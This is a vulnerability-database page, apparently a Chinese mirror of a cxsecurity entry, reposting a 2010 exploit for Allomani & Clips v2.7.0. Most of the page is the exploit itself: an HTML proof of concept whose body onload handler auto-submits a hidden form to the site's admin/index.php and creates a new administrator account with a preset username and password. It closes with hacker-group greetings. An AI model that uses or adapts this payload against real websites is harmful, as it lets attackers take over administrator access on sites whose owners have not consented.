Allomani & Clips v2.7.0 - CSRF Add Admin Account

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1050562 漏洞类型
发布时间 2010-06-26 更新时间 2010-06-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2010060112
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: Allomani & Clips v2.7.0 - [CSRF] Add Admin Account
# Date:25 -06-2010
# Author: G0D-F4Th3r
# Software Link: http://demos.allomani.com/songs270/
# Version: 2.7.0
# Tested on: http://demos.allomani.com/songs270/

####################################################
<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="http://www.site.com/[path]/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="username" value="admin2"/>
<input type="hidden" name="password" value="admin2123"/>
<input type="hidden" name="email" value="test@test.com"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="&#1575;&#1590;&#1575;&#1601;&#1577;"/>
</form>
</body>
</html>
############
Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends
############